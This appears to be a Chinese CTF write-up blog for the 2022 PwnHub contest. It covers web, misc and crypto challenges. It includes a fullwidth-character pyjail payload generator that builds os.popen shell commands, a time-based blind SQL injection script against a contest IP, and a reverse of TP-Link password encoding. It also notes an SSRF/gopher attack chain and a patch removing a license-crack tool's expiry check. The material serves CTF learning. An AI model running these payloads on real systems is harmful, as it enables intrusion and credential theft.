PwnHub

Web

Calc

过滤字母 + ，利用全角英文绕过
后台是由 eval 运行结果的，这不 pyjail
shell 生成

# ｏｐｅｎ(ｂｙｔｅｓ((47,102,108,97,103)).ｄｅｃｏｄｅ()).ｒｅａｄ()

## shell 生成，正常输入payload
shell = f"__import__('os').popen('{input()}').read()"
shell = ','.join([str(ord(i)) for i in shell])
a = f'eval(bytes(({shell})).decode())'
b = list('ａｂｃｄｅｆｇｈｉｊｋｌｍｎｏｐｑｒｓｔｕｖｗｘｙｚ')
c = list('abcdefghijklmnopqrstuvwxyz')
assert len(b) == len(c)
for i in range(len(c)):
    a = a.replace(c[i], b[i])
print(a)

reset

不会，看不懂，先记下

git 泄露获取 .git 文件
根据文章学习得知大致 .git 文件结构，主要内容分布在 objects 文件夹

1	https://www.leavesongs.com/PENETRATION/XDCTF-2015-WEB2-WRITEUP.html

写脚本

import zlib 
import os
import re

dirs = os.listdir()
for dir in dirs:
    if os.path.isdir(dir):
        files = os.listdir(dir)
        for f in files:
            with open(os.path.join(dir, f), 'rb') as a:
                data = zlib.decompress(a.read())
                if data:
                    with open(f, 'wb') as b:
                        b.write(data)

git 大概结构
一共两个版本，得到两个主要文件 reset.php upload.php
reset.php 关键代码

<?php
if (isset($_POST['id'])){
    $id = $_POST['id'];
    preg_match('/^[a-z0-9]{40}$/', $id) or die('Invalid commit id!');
    system("git reset --hard $id");
}
>

upload.php 关键代码

<?php
if (isset($_FILES['files'])){
    $fileType = $_FILES['file']['type'];
    $fileName = $_POST['filename'] ?? 'none';
    $size = $_FILES['file']['size'];
    $error = $_FILES['file']['error'];
    $whitelist = array("image/gif", "image/png", "image/jpeg", "iamge/jpg");
    # check type, size, error
    in_array($fileType, $whitelist) or die("Invalid file!1");
    $size < 20000 or die("Invalid fize!2");
    $error > 0 and die($error);

    # check filename
    preg_match('/[a-zA-Z0-9_]{10,}$/', $filename) or die("Invalid file type!");
    if (! move_uploadedFile($_FILES["file"]["tmp_name"], "./upload/", $fileName)){
        die("Invaild failed.");
    }
    echo 'saved-> '.$fileName."\n";
}
>

reset.php 就是回退某一个版本，upload.php 为文件上传

sql 注入，得到用户名密码，存在 waf

str_replace(' ', '', $username);
str_replace('#', '', $username);
str_replace('-', '', $username);
str_replace('*', '', $username);

xadmin  r7cVwbhc9TefbwK

发包，得到提示，解出 pwd 的明文，password.php
/web-static/js/su/su.js，查看加密流程
简单分析和搜索可以发现，这个加密代码其实是tplink的加密代码

def orgAuthPwd(pwd):
    strDe = "RDpbLfCPsJZ7fiv"
    dic = "yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciX"+\
    "TysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgML"+\
    "wygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3"+\
    "sfQ1xtXcPcf1aT303wAQhv66qzW"
    return securityEncode(pwd, strDe, dic)
def securityEncode(input1, input2, input3):
    dictionary = input3
    output = ""
    cl = 0xBB
    cr = 0xBB
    len1 = len(input1)
    len2 = len(input2)
    lenDict = len(dictionary)
    length = max(len1,len2)
    for index in range(0,length):
        cl = 0xBB
        cr = 0xBB
        if (index >= len1):
            cr = ord(input2[index])
        elif (index >= len2):
            cl = ord(input1[index])
        else:
            cl = ord(input1[index])
            cr = ord(input2[index])
        output += dictionary[(cl ^ cr)%lenDict]
    return output

简单分析下可以发现，这个加密存在缺陷，会出现严重的碰撞问题，跑⼀下5位纯数字

发现111110个明⽂对应73010个密⽂，仅仅是纯数字就有⽐较严重的碰撞问题
跑⼀下4位数字⼤⼩写字⺟
更严重了，1400w明⽂只能对应177w密⽂
由于不知道明⽂位数所以也不太好直接爆破
那么开始写逆向函数，由于不知道密码位数，我们分析可以发现⻓度超出密码明⽂部分的结果只与
strDe[i]及pwd[-1]有关，那么我们只需要爆破猜测⻓度写出逆向脚本即可

当测试⻓度为6时没有符合的结果，由于前端提示，⻓度也⾄少是5位，所以密码明⽂⻓度为5，接下来爆破即可

def orgAuthPwd(pwd):
    strDe = "RDpbLfCPsJZ7fiv"
    dic =
    "yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciX"+\
    "TysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgML"+\
    "wygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3"+\
    "sfQ1xtXcPcf1aT303wAQhv66qzW"
    return securityEncode(pwd, strDe, dic)
def securityEncode(input1, input2, input3):
    dictionary = input3
    output = ""
    cl = 0xBB
    cr = 0xBB
    len1 = len(input1)
    len2 = len(input2)
    lenDict = len(dictionary)
    length = max(len1,len2)
    for index in range(0,length):
        cl = 0xBB
        cr = 0xBB
        if (index >= len1):
            cr = ord(input2[index])
        elif (index >= len2):
            cl = ord(input1[index])
        else:
            cl = ord(input1[index])
            cr = ord(input2[index])
        output += dictionary[(cl ^ cr)%lenDict];
    return output;
def revese(pwd,length):
    ll=[]
    import re
    import string
    strDe = "RDpbLfCPsJZ7fiv"
    dic =
    "yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciX"+\
    "TysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgML"+\
    "wygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3"+\
    "sfQ1xtXcPcf1aT303wAQhv66qzW"
    for i in range(len(pwd)):
        l=[]
        r=re.findall(pwd[i],dic)
        x=0
        if i<length:
            for j in range(len(r)):
                x=dic.index(pwd[i],x+1)
                c=chr(x^ord(strDe[i]))
                if c in string.printable:
                    l.append(c)
        else:
            for j in range(len(r)):
                x=dic.index(pwd[i],x+1)
                c=chr(x^0xbb)
                if c in string.printable:
                    l.append(c)
        ll.append(l)
    return ll
import time
import requests
url='http://47.97.127.1:23840/'
flag=''
for i in range(1,16):
    left=33
    right=128
    while right-left!=1:
        mid=int((left+right)/2)
        json ={
        "method":"do",
        "login":{
        "username":"0\"^if((substr((select{space}binary{space}password{space}from{space}user),{i},1)>binary{space}{mid}),sleep(1),0);\0".format(i=i,mid=hex(mid), space=chr(9)),"password":"12345" }}
        t1=time.time()
        r=requests.post(url=url,json=json,) #proxies={'http':'http://127.0.0.1:8080'}
        print(r.content)
        t2=time.time()
        if t2-t1 >1:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print(flag)
flag='r7cVwbhc9TefbwK'
k=revese(flag,5)
print(k)
max_depth=5
p=[]
def ddp(s,depth):
    global k
    global max_depth
    if depth == max_depth:
        p.append(s)
        return
    for i in k[depth]:
        ddp(s+i,depth+1)
ddp('',0)
for i in p:
    print(i)
    print(requests.get(url=url+'/password.php?password='+i).content)

ssrfme

扫目录得到源码
重定向请求没有过滤，用file读取文件，读取flag没读到
利用 gopher 探测服务，6379 redis 没开，打 mysql
执行 readflag 获取 flag

sql

Misc

空投之王

AirDrop 取证，申请个盘古石
hash 爆破手机号
~~可恶，居然有这种工具，我快看瞎了~~

证书里也有秘密

找到项目

1	https://github.com/Lz1y/xrayhex-crack

下载后修改 main.go 源代码，将以下代码注释，用 -p 证书即可解析证书，第二个参数即为 user_id

validTime, _ := time.Parse("2006-01-02 15:04:05", "2021-01-01 00:00:00")
nowTime := time.Now()
if nowTime.After(validTime) {
    panic("本工具已失效")
}

飞驰人生

配置一下重放的环境，用 ubuntu 吧

1 2	https://www.anquanke.com/post/id/209141#h2-17 https://github.com/zombieCraig/ICSim

发现存在攻击行为速度暴涨和锁车门~~可恶锁车门没发现~~

1 2	244#000000A60000 19B#00000F000000

坐井观天

简单的 pyjail 空白爷 yyds!!!

1 2	eval(input()) __import__('os').popen('cat /flag').read()

Crypto

冰哥永远的神！
crypto

如果您喜欢此博客或发现它对您有用，则欢迎对此发表评论。也欢迎您共享此博客，以便更多人可以参与。如果博客中使用的图像侵犯了您的版权，请与作者联系以将其删除。谢谢！

2022 PwnHub

Web

Calc

reset

ssrfme

sql

Misc

空投之王

证书里也有秘密

飞驰人生

坐井观天

Crypto

特色标签

链友